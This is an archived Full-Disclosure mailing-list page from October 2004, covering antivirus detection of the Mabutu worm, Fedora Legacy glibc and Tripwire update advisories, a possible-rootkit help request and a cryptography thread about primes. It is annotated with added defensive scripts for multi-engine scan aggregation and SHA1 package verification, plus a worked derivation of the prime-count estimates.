
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  • application/octet-stream attachment: Toy.com

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Barrie Dempster (barriereboot-robot.net)
Date: Sat Oct 23 2004 - 02:32:07 CDT


This virus is very detectable. It is important to verify a file with a
variety of vendors before labelling it "new" (never "undetectable").
Your web page only proved that Hotmail's AV scanners didn't pick it up,
nothing more.

---- Pasted results from www.virustotal.com ----
Results of a file scan
This is the report of the scanning done over "details.scr" file that
VirusTotal processed on 10/23/2004 at 09:32:12.

Antivirus    Version         Update      Result
-----------  --------------  ----------  -------------------
BitDefender  7.0             10.22.2004  Win32.Mabutu.Amm
ClamWin      devel-20041018  10.22.2004  Worm.Mabutu.A-unp
eTrust-Iris  7.1.194.0       10.22.2004  Win32/Mabutu.A.Worm
F-Prot       3.15b           10.22.2004  W32/Mabuto.Bmm
Kaspersky    4.0.2.24        10.23.2004  I-Worm.Mabutu.a
NOD32v2      1.904           10.23.2004  Win32/Mabutu.A
Norman       5.70.10         10.22.2004  Mabutu.Amm
Panda        7.02.00         10.22.2004  W32/Mabutu.A.worm
Sybari       7.5.1314        10.23.2004  Mabutu.Am
Symantec     8.0             10.22.2004  W32.Mota.Bmm
---- END OF Pasted results from www.virustotal.com ----

On Fri, 2004-10-22 at 22:28 +0000, Farrukh Hussain wrote:
> Hi,
> Today I got an e-mail from "69.197.83.68" CANADA ISP which has an
> undetectable virus. Well, I downloaded this file but I didn't run it
> because I know it is a virus, and now I am complaining to "rogers.com"
> ISP about this matter, because I got this file from this ISP. It is
> abuse of internet service. I hope they will take some action about it.
> And also I am informing the security group about this matter.
>
> http://www.Anti-Hacking.info/undetectable_virus/index.html
>
>
>
> Best Regards from,
> Farrukh Hussain
> Security Group in Pakistan.
--
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBegj3sYtTQpYCX9ARArygAJ4i90e3tqWg5GV3E4Lwe8j2h9IigwCfbaIx
voAhkmh/9YzlT+YEahGhacM=
=3GJL
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Oct 23 2004 - 05:40:11 CDT


Andrew Smith to Farrukh Hussain:

> > Today I got e-mail from "69.197.83.68" CANADA ISP which has undetectable
> > virus.
>
> This just means that you or your A/V hasn't updated their virus
> definitions. Try multiple A/V programs, this will cover a wider range
> of 'viruses'.

_OR_ it means Farrukh was depending on an unreliable or outdated virus
scanner.

Scanned with 21 different scanners a few hours after the message was
posted and 20 of them detected it. This was not due to some recent (as
in the preceding few hours) rush of updates -- most web descriptions
agree that the virus they detected was first seen very late in July,
with a second variant a few days later, early in August.

That result _includes_ the same scanner (by name) that Hotmail
reputedly uses, but then, Hotmail failing to reliably keep its scanner
up to date, and/or the supplier of said scanner failing to provide
reliable updates to Hotmail are not exactly news, and it has been long
suspected that Hotmail's virus scanning is designed to "fail open"
(i.e. pass on Email that has not been scanned but report it as if it
has been scanned and found "not infected").

In short, this virus has been widely detected since late July/early
August by almost all "Western" virus detection engines, so the OP's
report and concerns would seem more than a tad misdirected...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
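
The two replies above make one operational point: a single engine's "not infected" is not a verdict, and a scanner that cannot scan must not report "clean". The script below is an added example, not code from either poster, from VirusTotal or from Hotmail. It takes the ten result rows pasted earlier in the thread, computes the detection ratio and the family-name aliases across vendors (Mabutu, Mabuto, Mota for one sample), flags engines running on stale signatures, and puts a fail-open gateway policy next to a fail-closed one. The `ExampleAV` engine and its dates are constructed, the seven-day staleness threshold is an assumed policy value, and the family-name normalisation is a simple token heuristic, not any vendor's naming scheme.

```python
"""Added example: multi-engine verdict aggregation and a fail-closed gateway
policy. Not code from the posters, VirusTotal or Hotmail.

The first ten rows of REPORT are the scan results pasted in the thread
(scan date 2004-10-23). "ExampleAV" is a constructed engine used to show a
stale-signature miss; the 7-day threshold is an assumed policy value.
"""
import re
from collections import Counter
from dataclasses import dataclass
from datetime import date
from typing import List, Optional


@dataclass(frozen=True)
class ScanResult:
    engine: str
    version: str
    signatures: date        # date of the signature set the engine ran with
    verdict: Optional[str]  # vendor's malware name, or None for "nothing found"
    error: bool = False     # True when the engine produced no verdict at all


REPORT_DATE = date(2004, 10, 23)
REPORT: List[ScanResult] = [
    ScanResult("BitDefender", "7.0", date(2004, 10, 22), "Win32.Mabutu.Amm"),
    ScanResult("ClamWin", "devel-20041018", date(2004, 10, 22), "Worm.Mabutu.A-unp"),
    ScanResult("eTrust-Iris", "7.1.194.0", date(2004, 10, 22), "Win32/Mabutu.A.Worm"),
    ScanResult("F-Prot", "3.15b", date(2004, 10, 22), "W32/Mabuto.Bmm"),
    ScanResult("Kaspersky", "4.0.2.24", date(2004, 10, 23), "I-Worm.Mabutu.a"),
    ScanResult("NOD32v2", "1.904", date(2004, 10, 23), "Win32/Mabutu.A"),
    ScanResult("Norman", "5.70.10", date(2004, 10, 22), "Mabutu.Amm"),
    ScanResult("Panda", "7.02.00", date(2004, 10, 22), "W32/Mabutu.A.worm"),
    ScanResult("Sybari", "7.5.1314", date(2004, 10, 23), "Mabutu.Am"),
    ScanResult("Symantec", "8.0", date(2004, 10, 22), "W32.Mota.Bmm"),
    # Constructed: months-old signatures, nothing found. This is the kind of
    # "clean" result the original poster treated as proof of a new virus.
    ScanResult("ExampleAV", "1.0", date(2004, 7, 1), None),
]

# Platform/type tokens that carry no family information in vendor names.
_GENERIC_TOKENS = {"win32", "w32", "worm", "i", "trojan", "unp"}


def family(verdict: str) -> str:
    """Heuristic: first name token that is not a platform/type marker.

    'Win32/Mabutu.A.Worm' -> 'mabutu', 'W32.Mota.Bmm' -> 'mota'. Vendors do
    not share a naming scheme; this only makes aliases visible.
    """
    for tok in re.split(r"[./\-]", verdict):
        if tok and tok.lower() not in _GENERIC_TOKENS:
            return tok.lower()
    return verdict.lower()


def detection_ratio(results):
    """(engines that named malware, engines that actually produced a verdict)."""
    scanned = [r for r in results if not r.error]
    hits = [r for r in scanned if r.verdict]
    return len(hits), len(scanned)


def families(results) -> Counter:
    """How many engines map to each family name; aliases show up as extra keys."""
    return Counter(family(r.verdict) for r in results if r.verdict)


def stale_engines(results, as_of: date, max_age_days: int = 7):
    """Engines whose signature set is older than max_age_days at scan time."""
    return [r.engine for r in results if (as_of - r.signatures).days > max_age_days]


def fail_open_decision(results) -> str:
    """The weak policy: anything not positively flagged is delivered, even
    when no engine managed to scan the file at all."""
    hits, _ = detection_ratio(results)
    return "block" if hits else "deliver"


def gateway_decision(results, as_of: date, min_engines: int = 1) -> str:
    """Fail-closed policy: 'unscanned' and 'scanned with stale signatures'
    are not 'clean'.

    block      - at least one engine named malware
    quarantine - no detection, but fewer than min_engines produced a verdict,
                 an engine errored, or an engine ran on stale signatures
    deliver    - every engine scanned with current signatures and found nothing
    """
    hits, scanned = detection_ratio(results)
    if hits:
        return "block"
    if scanned < min_engines or any(r.error for r in results) \
            or stale_engines(results, as_of):
        return "quarantine"
    return "deliver"


if __name__ == "__main__":
    hits, scanned = detection_ratio(REPORT)
    print(f"detections: {hits}/{scanned}")
    print("families:", dict(families(REPORT)))
    print("stale:", stale_engines(REPORT, REPORT_DATE))
    print("decision:", gateway_decision(REPORT, REPORT_DATE))
```

On the pasted rows this gives 10 detections out of 11 verdicts, three family spellings for one sample, and `ExampleAV` flagged as stale; the sample is blocked either way. The policies only differ on the case Nick describes: when every engine errors out, `fail_open_decision` delivers and `gateway_decision` quarantines.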



 
[Full-Disclosure] [FLSA-2004:1947] Updated glibc packages fix flaws

From: Marc Deslauriers (marcdeslauriersvideotron.ca)
Date: Sat Oct 23 2004 - 06:28:43 CDT


-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated glibc packages fix flaws
Advisory ID: FLSA:1947
Issue date: 2004-10-23
Product: Red Hat Linux
Keywords: Bugfix
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1947
CVE Names: CAN-2002-0029
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated glibc packages that fix a security flaw in the resolver as well
as dlclose handling are now available.

The GNU libc packages (known as glibc) contain the standard C libraries
used by applications.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

A security audit of glibc revealed a flaw in the resolver library which
was originally reported as affecting versions of ISC BIND 4.9. This flaw
also applied to glibc versions before 2.3.2. An attacker who is able to
send DNS responses (perhaps by creating a malicious DNS server) could
remotely exploit this vulnerability to execute arbitrary code or cause a
denial of service. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2002-0029 to this issue.

All users of glibc should upgrade to these updated packages, which
resolve these issues.

4. Solution:

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - bug #1947

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/glibc-2.2.5-44.legacy.3.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-2.2.5-44.legacy.3.i686.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-common-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i686.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-static-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-devel-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-profile-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-utils-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/nscd-2.2.5-44.legacy.3.i386.rpm

7. Verification:

SHA1 sum Package Name
---------------------------------------------------------------------------

787b02c547d9578eab2112b681d58ce40589dd37
7.3/updates/i386/glibc-2.2.5-44.legacy.3.i386.rpm
d73f3bf9fd6c094dbf3d7c0409c0d34de40a1cfd
7.3/updates/i386/glibc-2.2.5-44.legacy.3.i686.rpm
df3fdb0f5d327b10bb285b06a5f1422642b980b7
7.3/updates/i386/glibc-common-2.2.5-44.legacy.3.i386.rpm
61e6c8521d67f38e96c679b3d263f6dccfb43b75
7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i386.rpm
d5b070b85a0a57702f3259790e59707dd8d67ef1
7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i686.rpm
e8988fb212ad671469f190f01b35c7664298ea58
7.3/updates/i386/glibc-debug-static-2.2.5-44.legacy.3.i386.rpm
f2043d369aeb8a8a39b0f1e429fdbcf08dcefd5b
7.3/updates/i386/glibc-devel-2.2.5-44.legacy.3.i386.rpm
5902d254f9926b0c532e8af5e0fe3ed22e105215
7.3/updates/i386/glibc-profile-2.2.5-44.legacy.3.i386.rpm
6c8b2d53b0626265c180ba09a1a6161e4be6765d
7.3/updates/i386/glibc-utils-2.2.5-44.legacy.3.i386.rpm
26282373e4cd3770b40b3cf10dc17b7f6f23ce6a
7.3/updates/i386/nscd-2.2.5-44.legacy.3.i386.rpm
b8f02cd099305c9866715493147ca9c9dcecfff0
7.3/updates/SRPMS/glibc-2.2.5-44.legacy.3.src.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0029
http://www.kb.cert.org/vuls/id/844360

9. Contact:

The Fedora Legacy security contact is <secnotice@fedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBekBrLMAs/0C4zNoRAseXAKC6IGUi8a0E1KwzE3XWlQEBbfDTEwCeM9mF
m9tX/zENMqWea1g6qZ9j4EQ=
=2dsU
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Owned by an iPod

From: Matt Johnston (mattjtartarus.uwa.edu.au)
Date: Sat Oct 23 2004 - 05:09:32 CDT


On Fri, Oct 22, 2004 at 10:53:55AM -0700, Dragos Ruiu wrote:
> On October 21, 2004 10:22 pm, Rosalina Hamar wrote:
> > i heart about that demonstration a couple of weeks ago. now
> > it's an official announcement at parsec.jp [0]. since there is not
> > much technical info on that issue in the announcement, i googled
> > around and found a link to an interesting post about the IEEE1394
> > OHCI interface on kerneltrap [1] back in 2002.
> >
> > shish ...
> > rosa
> >
> > [0] http://pacsec.jp/advisories.html
> > [1] http://kerneltrap.org/node/view/145
>
> More technical information on this vulnerability,
> and some of the other vulnerabilities, fixes and
> techniques from the conference will be published
> after the conference.

At least on Mac OS X, a workaround appears to be enabling
an openfirmware password[1]. I assume that most firewire
chipsets would have the capability to disable raw memory
access if the OS asks nicely? Of course whether it's
disabled before the OS loads is another matter...

Matt

[1] http://matt.ucc.asn.au/apple/



 
[Full-Disclosure] [FLSA-2004:1719] Updated Tripwire packages fix security flaw

From: Marc Deslauriers (marcdeslauriersvideotron.ca)
Date: Sat Oct 23 2004 - 06:27:30 CDT


-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated Tripwire packages fix security flaw
Advisory ID: FLSA:1719
Issue date: 2004-10-23
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1719
CVE Names: CAN-2004-0536
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated Tripwire packages that fix a format string security
vulnerability are now available.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386

3. Problem description:

Tripwire is a system integrity assessment tool.

Paul Herman discovered a format string vulnerability in Tripwire version
2.3.1 and earlier. If Tripwire is configured to send reports via email,
a local user could gain privileges by creating a carefully crafted file.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2004-0536 to this issue.

Users of Tripwire are advised to upgrade to this erratum package which
contains a backported security patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1719 - Format String Vulnerability in
Tripwire

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tripwire-2.3.1-10.1.legacy.7x.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tripwire-2.3.1-10.1.legacy.7x.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/tripwire-2.3.1-17.2.legacy.9.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/tripwire-2.3.1-17.2.legacy.9.i386.rpm

7. Verification:

SHA1 sum Package Name
------------------------------------------------------------------------

1b2a8875e86492065f53db69d04de4a452fb1c5f
7.3/updates/i386/tripwire-2.3.1-10.1.legacy.7x.i386.rpm
3d1d0f2a2b4b27c1e5d3b05dbea78d95c70ddcc2
7.3/updates/SRPMS/tripwire-2.3.1-10.1.legacy.7x.src.rpm
cdc032af7c3fa3cfbe153c85a0044bdbbb6326b5
9/updates/i386/tripwire-2.3.1-17.2.legacy.9.i386.rpm
263704b1799204e8ee98b4329cddf7b492d8fff2
9/updates/SRPMS/tripwire-2.3.1-17.2.legacy.9.src.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://marc.theaimsgroup.com/?l=bugtraq&m=108668791510153
http://lw.ftw.zamosc.pl/lha-exploit.txt

9. Contact:

The Fedora Legacy security contact is <secnotice@fedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBekAhLMAs/0C4zNoRAq9VAJ9oFJ5zRcNClCxyq7KlLrACgYuAhgCgwx2B
fVuHqnCklAZplxt3m/rWtLk=
=OxE7
-----END PGP SIGNATURE-----
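
Both Fedora Legacy advisories above (FLSA:1947 for glibc and FLSA:1719 for Tripwire) publish a "SHA1 sum / Package Name" list and tell the reader to compare it against `sha1sum <filename>`. The script below is an added example, not Fedora Legacy tooling: it parses that exact two-lines-per-entry format (the Tripwire entries are embedded verbatim), hashes every listed file under a download directory, and reports ok, mismatch or missing per package. The `demo()` run builds constructed files with made-up package names so that it works offline. Two caveats the advisories leave implicit: the digest list only proves that a download matches what the advisory says, so it is worth something only after `gpg --verify` of the clearsigned advisory itself; and `rpm --checksig` is the check that ties a package to Fedora Legacy's signing key rather than to whatever an HTTP mirror served. SHA-1 is used here solely because that is what the advisories publish.

```python
"""Added example (not Fedora Legacy tooling): check downloaded packages
against the "SHA1 sum / Package Name" list an FLSA advisory carries.

TRIPWIRE_MANIFEST is copied from FLSA:1719 above. demo() writes constructed
files with made-up names so the whole thing runs offline.
"""
import hashlib
import hmac
import os
import re
import tempfile
from typing import Dict

TRIPWIRE_MANIFEST = """\
SHA1 sum Package Name
------------------------------------------------------------------------

1b2a8875e86492065f53db69d04de4a452fb1c5f
7.3/updates/i386/tripwire-2.3.1-10.1.legacy.7x.i386.rpm
3d1d0f2a2b4b27c1e5d3b05dbea78d95c70ddcc2
7.3/updates/SRPMS/tripwire-2.3.1-10.1.legacy.7x.src.rpm
cdc032af7c3fa3cfbe153c85a0044bdbbb6326b5
9/updates/i386/tripwire-2.3.1-17.2.legacy.9.i386.rpm
263704b1799204e8ee98b4329cddf7b492d8fff2
9/updates/SRPMS/tripwire-2.3.1-17.2.legacy.9.src.rpm
"""

_SHA1_HEX = re.compile(r"[0-9a-f]{40}")


def parse_manifest(text: str) -> Dict[str, str]:
    """Map package path -> expected digest.

    The advisories print each entry as two lines: the digest, then the path
    relative to the download root. Header and ruler lines are skipped.
    """
    expected: Dict[str, str] = {}
    pending = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if pending is None:
            if _SHA1_HEX.fullmatch(line):
                pending = line
            continue              # header / ruler / stray text
        expected[line] = pending  # the line after a digest is its path
        pending = None
    if pending is not None:
        raise ValueError("manifest ends with a digest that has no package name")
    return expected


def sha1_of_file(path: str, chunk: int = 1 << 16) -> str:
    """Stream the file so large RPMs do not have to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_packages(manifest_text: str, download_root: str) -> Dict[str, str]:
    """Return {package path: 'ok' | 'mismatch' | 'missing'} for every entry."""
    status: Dict[str, str] = {}
    for rel, digest in parse_manifest(manifest_text).items():
        full = os.path.join(download_root, rel)
        if not os.path.isfile(full):
            status[rel] = "missing"
        elif hmac.compare_digest(sha1_of_file(full), digest):
            status[rel] = "ok"
        else:
            status[rel] = "mismatch"
    return status


def demo() -> Dict[str, str]:
    """Constructed run: two intact files, one altered after download, one absent."""
    rel_dir = "7.3/updates/i386"
    files = {
        "good-1.0-1.legacy.i386.rpm": b"constructed package bytes #1",
        "good-2.0-1.legacy.i386.rpm": b"constructed package bytes #2",
        "altered-1.0-1.legacy.i386.rpm": b"constructed package bytes #3",
    }
    lines = ["SHA1 sum Package Name", "-" * 72, ""]
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, rel_dir))
        for name, data in files.items():
            with open(os.path.join(root, rel_dir, name), "wb") as f:
                f.write(data)
            lines += [hashlib.sha1(data).hexdigest(), f"{rel_dir}/{name}"]
        # Listed in the advisory, never downloaded.
        lines += [hashlib.sha1(b"absent").hexdigest(),
                  f"{rel_dir}/absent-1.0-1.legacy.i386.rpm"]
        # Corrupt one file after its digest was recorded.
        with open(os.path.join(root, rel_dir, "altered-1.0-1.legacy.i386.rpm"), "ab") as f:
            f.write(b"\x00")
        return verify_packages("\n".join(lines), root)


if __name__ == "__main__":
    for rel, digest in parse_manifest(TRIPWIRE_MANIFEST).items():
        print(f"{digest}  {rel}")
    for rel, state in demo().items():
        print(f"{state:9} {rel}")
```

To use it on a real download, mirror the directory layout the URLs use (`7.3/updates/i386/...`, `9/updates/SRPMS/...`) under one root and pass the advisory's list verbatim. A "mismatch" means stop and re-fetch, a "missing" is an update you have not downloaded yet, and neither result replaces `rpm --checksig -v`.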



 
[Full-Disclosure] Help, possible rootkit

From: BillyBob (billybobknobhotmail.com)
Date: Sat Oct 23 2004 - 11:05:29 CDT


I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around
25 - 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions?
Any more rootkit-finding tools for Windows?

Thanks
Bill



 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Isshogei (isshogeiisshogei.de)
Date: Sat Oct 23 2004 - 11:14:00 CDT


Hi, I have downloaded this virus and checked it with my AVG. It found it. Better to use this software --> www.grisoft.com
here a log from AVG:
C:\Documents and Settings\USERNAME\DESKTOP\DETAILS.ZIP:\details\details..scr Virus identified I-Worm/Mabutu

regards

Isshogei



 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Isshogei (isshogeiisshogei.de)
Date: Sat Oct 23 2004 - 11:10:51 CDT


Hi, I have downloaded this virus and checked it with my AVG. It found it. Better to use this software --> www.grisoft.com

regards



 
[Full-Disclosure] (no subject)

patrickhats-tech.net
Date: Sat Oct 23 2004 - 11:55:09 CDT


Please make a note of this email address change.

For business related items, please contact me at patrickhendricknetworks.com

For personal emails, please contact me at patrickfedoracore.org

Thank you!



 
Re: [Full-Disclosure] Help, possible rootkit

From: Michael Rutledge (michael4447gmail.com)
Date: Sat Oct 23 2004 - 12:10:32 CDT


What type of software do you use on a regular basis, and what software
have you installed recently? Is this a new install of XP? Also, have
you installed SP2?

Give us a little background about your system so that we can rule out
common software glitches.

-Michael

On Sat, 23 Oct 2004 13:05:29 -0300, BillyBob <billybobknobhotmail.com> wrote:
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have around
> 25 - 30 % usage, but when I open it, there is no process listed using this
> much.
> - I did a netstat, fport, openports and none of these show that I have any
> odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop. They
> stop if I reboot, but then start again.
>
> I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
> could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>


 
RE: [Full-Disclosure] Help, possible rootkit

From: ISNYC (admininfosecnyc.com)
Date: Sat Oct 23 2004 - 13:24:37 CDT


I wouldn't run detection tools from the OS; use a boot CD.

Pref: FIRE or Knoppix/Knoppix-STD

FIRE by DMZ Services Inc.
http://fire.dmzs.com/

Knoppix STD 0.1
http://www.knoppix-std.org/

KNOPPIX Bootable Linux CD
http://www.knopper.net/knoppix/index-en.html

Good Luck,
Dominick S.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: Saturday, October 23, 2004 12:05 PM
To: Full Disclosure
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around 25
- 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions ?
Any more rootkit finding tools for Windows ?

Thanks
Bill



 
Re: [Full-Disclosure] Crypto and Primes

From: Andrew (notesshaw.ca)
Date: Sat Oct 23 2004 - 13:25:16 CDT


And .. where would you get all of those primes? My rough estimate says
that even if every person on the planet (6,000,000,000) turned on their PC
capable of generating random 512 bit primes at the rate of 100 trillion
(100,000,000,000,000) primes per second it would still take way more than
1e100 TIMES the age of the universe(!) to even bring the chances of getting
a particular 512 bit prime to the odds of 1 in a billion.

Age of the universe given as 18 billion years, which is rounded up to the
highest billion years from the oldest estimate, found at:
http://www.astro.ucla.edu/~wright/age.html ymmv.

Reality parody. Not to be taken seriously.
Professional driver on a closed course.
Do not try this at home.

  - A

At 07:33 PM 10/22/2004, Jeremy Bishop wrote:
>On Friday 22 October 2004 14:31, Daniel Sichel wrote:
>
> > Depending on how rigourous you are being, the large in large numbers
> > is a relative term. I know from talking to someone who has worked in
> > for real government crypto that there is enough storage space to
> > create a lookup db of a good chunk (if not all) of the PGP crypto
> > keys in use for common key sizes (512 and 1024). I doubt SSL is less
> > vulnerable. I guess there's force, brute force, and brute force with
> > taxpayer dollars.
>
>If you are speaking of a database in which you could look up different
>keys, of course it's possible. I suggest http://pgp.mit.edu/ for an
>example of such a system.
>
>If you are thinking of the primes involved in these keys, I would like
>to direct your attention to this quote:
>
>----
>RSA is typically performed using 512bit prime numbers. There are
>approximately 3.778e151 such prime numbers. Using the advanced storage
>technology available to the NSA, it should be possible to store a 512
>bit number in a single hydrogen atom. A typical universe (e.g. ours)
>contains approximately 1e90 hydrogen atoms. If the NSA has hidden
>3.778e61 universes in an inconspicuous little building in Maryland,
>astronomers should notice some deviations in the gravity field in the
>area.
>
>(HansM; http://web.ukonline.co.uk/eric.price/humour/hum0110.htm)
>----
>
>A more interesting question might be, in this case, how would a
>government know which of those primes have been used. This information
>would be feasible to store, but would require compromising just about
>every random number generator in use by the crypto-fanatics who make
>use of PGP.
>
> > Also with cheapo Linux clusters I would think a determined
> > hackmeister could do a crack on large prime based crypto, whether
> > that would be computationally feasible in a relevant time frame, I
> > don't know. I do know my gut tells me SSL is cryptographically weak
> > and I refuse to use it in place of IPSEC.
>
>In that case, I assume you are using IPSEC with shared secrets instead
>of certificates, no?
>
>--
>The universe does not have laws -- it has habits, and habits can
>be broken.
> -- BSD fortune file
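
The two figures quoted in this message, the 3.778e151 count and the "more than 1e100 times the age of the universe" ratio, can be checked with the prime number theorem and the rates the message gives. The derivation below is added here and is not from either poster; it assumes every generated prime is an independent uniform draw from the 512-bit range (the assumption the estimate implicitly makes) and rounds to two digits.

```latex
\pi(x) \approx \frac{x}{\ln x}
\qquad
\pi(2^{512}) \approx \frac{2^{512}}{512\ln 2}
  \approx \frac{1.34\times10^{154}}{354.9}
  \approx 3.78\times10^{151}

\text{primes of exactly 512 bits: }\;
\pi(2^{512}) - \pi(2^{511})
  \approx 3.78\times10^{151} - 1.89\times10^{151}
  \approx 1.9\times10^{151}

R = 6\times10^{9}\ \text{machines} \times 10^{14}\ \text{primes/s}
  = 6\times10^{23}\ \text{primes/s}

T = 1.8\times10^{10}\ \text{yr} \times 3.16\times10^{7}\ \text{s/yr}
  \approx 5.7\times10^{17}\ \text{s}

N_{\text{one age}} = R\,T \approx 3.4\times10^{41}

N_{10^{-9}} = 10^{-9}\,\pi(2^{512}) \approx 3.8\times10^{142}

\frac{N_{10^{-9}}}{N_{\text{one age}}}
  \approx \frac{3.8\times10^{142}}{3.4\times10^{41}}
  \approx 1.1\times10^{101}
```

So the quoted 3.778e151 is π(2^512), the number of all primes below 2^512; primes of exactly 512 bits number about half that. Either way the ratio comes out near 1e101 ages of the universe, which is the "way more than 1e100 times" in the message.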



 
